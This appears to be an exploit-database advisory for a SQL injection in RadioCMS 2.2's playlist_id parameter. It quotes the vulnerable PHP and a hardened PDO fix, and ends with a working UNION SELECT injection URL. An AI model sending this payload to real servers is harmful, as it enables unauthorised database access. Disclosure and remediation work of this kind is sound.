RadioCMS 2.2 - 'menager.php?playlist_id' SQL Injection

Author: Rooster(XEKA)
type: webapps
platform: php
port: 
date_added: 2013-05-26  
date_updated: 2013-05-26  
verified: 0  
codes: CVE-2013-3531;OSVDB-92088  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comRadioCMS.v.2.2.rar  

raw file: 25726.txt  
#################################################
+
+ Title: RadioCMS 2.2
+ Author: Rooster(XEKA)
+ Greetz to: Isis,luz3r,slider
+ Contact: forum.xeksec.com
+
#################################################

--[ Vuln Code ] --

...
if ($_GET['playlist_id']) {
  $playlist_id_get = $_GET['playlist_id'];   // raw request value, no validation or casting
}
...
if ($playlist_id != "") {
  $query = "SELECT * FROM `playlist` WHERE $playlist_id;";   // request value interpolated directly into the WHERE clause
...
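A hardened replacement for the query above, added here as an illustration (not RadioCMS code). It assumes a PDO connection in $pdo and that `playlist` has an integer `id` column; the column name is an assumption, since the original uses the raw parameter as the whole WHERE clause.

```php
<?php
// Added example, not part of RadioCMS. Assumes a PDO handle ($pdo) and an
// integer `id` column on `playlist` (column name is an assumption).

/**
 * Fetch one playlist row by id, or null if the parameter is missing/invalid.
 * The id is validated as a positive integer and bound as a typed parameter,
 * so the WHERE clause is fixed SQL text and the request can't alter the query.
 */
function fetch_playlist(PDO $pdo, array $get): ?array
{
    if (!isset($get['playlist_id'])) {
        return null;
    }
    // Anything that is not a plain positive integer (e.g. "-1 union select ...")
    // is rejected here before any SQL is built.
    $id = filter_var($get['playlist_id'], FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($id === false) {
        return null;
    }

    $stmt = $pdo->prepare('SELECT * FROM `playlist` WHERE `id` = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    return $row === false ? null : $row;
}

// Usage inside the page script (credentials/DSN are placeholders):
// $pdo = new PDO('mysql:host=localhost;dbname=radio', $user, $pass, [
//     PDO::ATTR_EMULATE_PREPARES => false,        // server-side prepared statements
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
// ]);
// $playlist = fetch_playlist($pdo, $_GET);
```

The same pattern applies to every other request parameter that reaches a query: validate the type, then bind it; never splice it into the SQL string.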


################################################

--[ Exploitable ]--

http://server/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12

################################################